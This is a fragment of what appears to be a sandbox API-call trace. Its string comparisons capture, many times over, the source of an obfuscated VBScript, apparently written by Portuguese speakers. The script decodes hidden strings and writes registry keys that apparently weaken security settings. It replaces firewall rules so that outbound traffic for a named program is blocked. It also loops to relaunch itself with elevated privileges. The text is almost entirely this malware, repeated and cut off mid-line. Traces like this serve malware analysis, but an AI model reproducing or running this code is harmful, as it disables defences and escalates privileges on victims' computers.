bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 27 [0226.302] wcsncmp (_String1="Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 63 [0226.303] wcsncmp (_String1="en(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.303] wcsncmp (_String1="n(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0226.303] wcsncmp (_String1="(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), 